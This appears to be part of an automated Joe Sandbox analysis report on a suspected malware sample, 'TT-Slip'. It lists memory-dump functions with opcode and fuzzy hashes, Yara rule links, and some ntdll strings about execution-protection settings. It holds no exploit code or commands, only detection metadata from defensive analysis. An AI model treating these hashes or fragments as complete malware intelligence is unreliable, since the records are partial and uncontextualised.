Function 0171930B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction ID: 446b74351a647e7dc1b9957b50b7fc6f518bb3f237602e5ab7d028c8a41ddce6
Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction Fuzzy Hash: D0D01735941AC48FE727CB0CC165B90BBF4F705B44F851098E14247AA2C27C9985CB00

Function 016B0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: df967131ed8df3e1bd40a224c11ac22fc82bcf0fca52918fa936e8b3caedd114
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 8BD01236100249EFCB11DF41C890D9B7B3BFBD8710F108019FD19076108A31ED62DB50

Function 016D3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
Instruction ID: abda881e26f87180bd3075001964406442059f563fab1e071ff1154d29ad5777
Opcode Fuzzy Hash: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
Instruction Fuzzy Hash: 1A90022120284442D140765C4C08B0F414997E1202F95C119A8156A54DC91589555721

Function 016D3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
Instruction ID: e7455696b937326ffb042207b8b1d10aa8f978fac1d165261194e7d6175c8ea8
Opcode Fuzzy Hash: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
Instruction Fuzzy Hash: 0D90022124240802D140755C8818707004AD7D0601F55C111A4024A54EC6168A6567B1

Function 016D4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
Instruction ID: 40bcdfbd4ea1c420813955d6001ae75c38ceeaf954177ef336399aaa7c61bab8
Opcode Fuzzy Hash: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
Instruction Fuzzy Hash: 5C900231606800129140755C4C885474049A7E0301B55C111E4424A54DCA148A565361

Function 016D4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
Instruction ID: 82ef257d0559fb3a29e9a6cd60a2fe59b7c60188afab8968266e96ae2a3277ec
Opcode Fuzzy Hash: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
Instruction Fuzzy Hash: D4900261602500424140755C4C084076049A7E1301395C215A4554A60DC61889559369

Function 016D39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
Instruction ID: 3460fb6c8b25ad5ac81b6f9e78c528e8ec355e4ec7ca9872febedda09ccb6ac1
Opcode Fuzzy Hash: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
Instruction Fuzzy Hash: 2A90022124645102D150755C48086174049B7E0201F55C121A4814A94EC55589556321

Function 016D2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
Instruction ID: 67a364fe8e14ed5632886f95e86cd4f5d87f07dfc5b7f13aaae13740efc2225f
Opcode Fuzzy Hash: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
Instruction Fuzzy Hash: B190023120644842D140755C4808A47005997D0305F55C111A4064B94ED6258E55B761

Function 016D2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
Instruction ID: c3a34b5f254555c36356b5217c86ff3a484bd86302627ff31b4562c86115bac1
Opcode Fuzzy Hash: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
Instruction Fuzzy Hash: B090023120240802D180755C480864B004997D1301F95C115A4025B54ECA158B5977A1

Function 016D2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
Instruction ID: 232d4d706690b32cc14004843a87c5bee3c5946ef354eaa3bde78fae63c9391a
Opcode Fuzzy Hash: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
Instruction Fuzzy Hash: 4390023160640802D150755C4818747004997D0301F55C111A4024B54EC7558B5577A1

Function 016D2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
Instruction ID: 040f88c164f44f4adfd2eb92ce1a59921d1d4e6edc326dfb892bbf0a81c6ffa9
Opcode Fuzzy Hash: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
Instruction Fuzzy Hash: F790023120240802D104755C4C08687004997D0301F55C111AA024B55FD66589917231

Function 016D2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
Instruction ID: f6fe2125959c0eff1d856123e2189a418f0e19c6616de5229c81eea04104cfbd
Opcode Fuzzy Hash: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
Instruction Fuzzy Hash: E3900225222400020145B95C0A0850B0489A7D6351395C115F5416A90DC62189655321

Function 016D2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
Instruction ID: fbeb6e38e0f15ba1485f91c0f5dd7b6aab7dbfd053700c4e38834fbb000bb550
Opcode Fuzzy Hash: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
Instruction Fuzzy Hash: 58900225212400030105B95C0B08507008A97D5351355C121F5015A50DD62189615221

Function 016D2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
Instruction ID: 701465d613ce9c61df5ae903ff70ee9e306711b72378145b538d3bc9442f934d
Opcode Fuzzy Hash: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
Instruction Fuzzy Hash: B69002A1202540924500B65C8808B0B454997E0201B55C116E5054A60DC52589519235

Function 016D3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
Instruction ID: 8e594a7eab151b52a3446de99748328de2428a7f017775ed50916df994a6d803
Opcode Fuzzy Hash: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
Instruction Fuzzy Hash: F790023520240402D510755C5C08647008A97D0301F55D511A4424A58EC65489A1A221

Function 016D2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
Instruction ID: 486a48874a061be682f80485b46ce9e1ea673ed063d4ed8d84277817219d411a
Opcode Fuzzy Hash: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
Instruction Fuzzy Hash: C790022130240003D140755C581C6074049E7E1301F55D111E4414A54DD91589565322

Function 016D2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
Instruction ID: d6db4e49971f0015f753f2fa5e2880271e61bb6bce6948ddd62a7fe9c952ab98
Opcode Fuzzy Hash: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
Instruction Fuzzy Hash: 9190022120644442D100795C580CA07004997D0205F55D111A5064A95EC6358951A231

Function 016D2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
Instruction ID: ce7f9a152cea4fc617bb2d5185193958331a3c5bc099e764255080d609a79892
Opcode Fuzzy Hash: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
Instruction Fuzzy Hash: 2590022921340002D180755C580C60B004997D1202F95D515A4015A58DC91589695321

Function 016D3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
Instruction ID: 1476b6714a0eeca650cedcde0bb6f56927ce0772fce1697301096b440ee04ca9
Opcode Fuzzy Hash: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
Instruction Fuzzy Hash: D1900231203401429540765C5C08A4F414997E1302B95D515A4015A54DC91489615321

Function 016D2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
Instruction ID: 418ae42a3089299a258ac27baf409d198cb57903cb854c0114405629dfbc5d13
Opcode Fuzzy Hash: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
Instruction Fuzzy Hash: DB900221243441525545B55C4808507404AA7E0241795C112A5414E50DC5269956D721

Function 016D2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
Instruction ID: c2d4875835202249071c6a66e61a2878d8394771e725bca2dd2aa50459ae8cc3
Opcode Fuzzy Hash: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
Instruction Fuzzy Hash: B690023124240402D141755C4808607004DA7D0241F95C112A4424A54FC6558B56AB61

Function 016D2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621

Function 016D2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
Instruction ID: 0cbb256049feda6ee57826decaae356b8c4ba4b9cca100548cf436e926352f7a
Opcode Fuzzy Hash: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
Instruction Fuzzy Hash: E090023120240403D100755C590C707004997D0201F55D511A4424A58ED65689516221

Function 016D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
Instruction ID: f704e51f2afb24ec5544675b4a581932c02d94c67a0bb58546025a2d23608f54
Opcode Fuzzy Hash: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
Instruction Fuzzy Hash: E990022160640402D140755C581C707005997D0201F55D111A4024A54EC6598B5567A1

Function 016D2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
Instruction ID: b869a1ab81f0159d3bc93521e73188a656c628a9c7296d392623c7fcea6c0567
Opcode Fuzzy Hash: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
Instruction Fuzzy Hash: 0690023120240402D100799C580C647004997E0301F55D111A9024A55FC66589916231

Function 016D2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
Instruction ID: ea9a54c076c2736ed19a7cb4ccd9eb3caf8d221ffc09f17832a377a2f9085e0d
Opcode Fuzzy Hash: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
Instruction Fuzzy Hash: 1C90026121240042D104755C4808707008997E1201F55C112A6154A54DC5298D615225

Function 016D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
Instruction ID: 894fb6dcd607ecbc9c3c32ff19d910e98946b7c5981f91292ffd82e02673c878
Opcode Fuzzy Hash: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
Instruction Fuzzy Hash: 9190026134240442D100755C4818B070049D7E1301F55C115E5064A54EC619CD526226

Function 016D2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
Instruction ID: 900fd6575e1e75818f0791e95d4b5c32515afb8c8203a722667dcf976d8474a8
Opcode Fuzzy Hash: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
Instruction Fuzzy Hash: 26900221212C0042D200796C4C18B07004997D0303F55C215A4154A54DC91589615621

Function 016D2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
Instruction ID: 648bb8252994846ce491aec10fda6e9a317f47828dcfb7b96a03b2446a43f20f
Opcode Fuzzy Hash: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
Instruction Fuzzy Hash: 2490023120280402D100755C4C0C747004997D0302F55C111A9164A55FC665C9916631

Function 016D2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
Instruction ID: 032bc80fc6fa715cf7073b431599936399b43ccdea7155d039d0274f888f9db8
Opcode Fuzzy Hash: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
Instruction Fuzzy Hash: 46900221602400424140756C8C489074049BBE1211755C221A4998A50EC55989655765

Function 016D2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
Instruction ID: b5b4ae7d2cbc1f6114c3a5438c225eb048d3008c4537e38c9c71ad3a7c85bc2e
Opcode Fuzzy Hash: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
Instruction Fuzzy Hash: 7190023120280402D100755C4C1870B004997D0302F55C111A5164A55EC62589516671

Function 016D2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
Instruction ID: 647220fea09f81b03be9b0750c41e3fe8ae09ebd120804047654dcc217af34bb
Opcode Fuzzy Hash: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
Instruction Fuzzy Hash: 4690022130240402D102755C4818607004DD7D1345F95C112E5424A55EC6258A53A232

Function 016D2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
Instruction ID: 73d9b1a9abc0de124fff56b5e22687d51ae209ce7fc866932e9cd977816fe1cb
Opcode Fuzzy Hash: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
Instruction Fuzzy Hash: 1490026120280403D140795C4C08607004997D0302F55C111A6064A55FCA298D516235

Function 016D2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
Instruction ID: 03d078a4c6a0c86822d3fef07523c463c000270fd9f2fe8087c0e946f4b3ec36
Opcode Fuzzy Hash: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
Instruction Fuzzy Hash: 7590027120240402D140755C4808747004997D0301F55C111A9064A54FC6598ED56765

Function 016D2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
Instruction ID: 08d7d9b25f7e0e8903b82d98c4785996383126a72bce5afa846d8425b377df2e
Opcode Fuzzy Hash: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
Instruction Fuzzy Hash: 7990022160240502D101755C4808617004E97D0241F95C122A5024A55FCA258A92A231

Function 016D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 6f6ad15721a741acbce91f24dcc87f3e22b429fe3d4e0ed3ea8c24ce9bbeb85f
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 016D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016D293C
___swprintf_l.LIBCMT ref: 016D295E
___swprintf_l.LIBCMT ref: 016D29A3
___swprintf_l.LIBCMT ref: 0170A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0170A527
::ffff:0:%u.%u.%u.%u, xrefs: 0170A54E
ffff:, xrefs: 0170A504
:%u.%u.%u.%u, xrefs: 0170A5B8

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0

Function 016C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017046FC
ExecuteOptions, xrefs: 017046A0
Execute=1, xrefs: 01704713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01704787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01704655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01704725
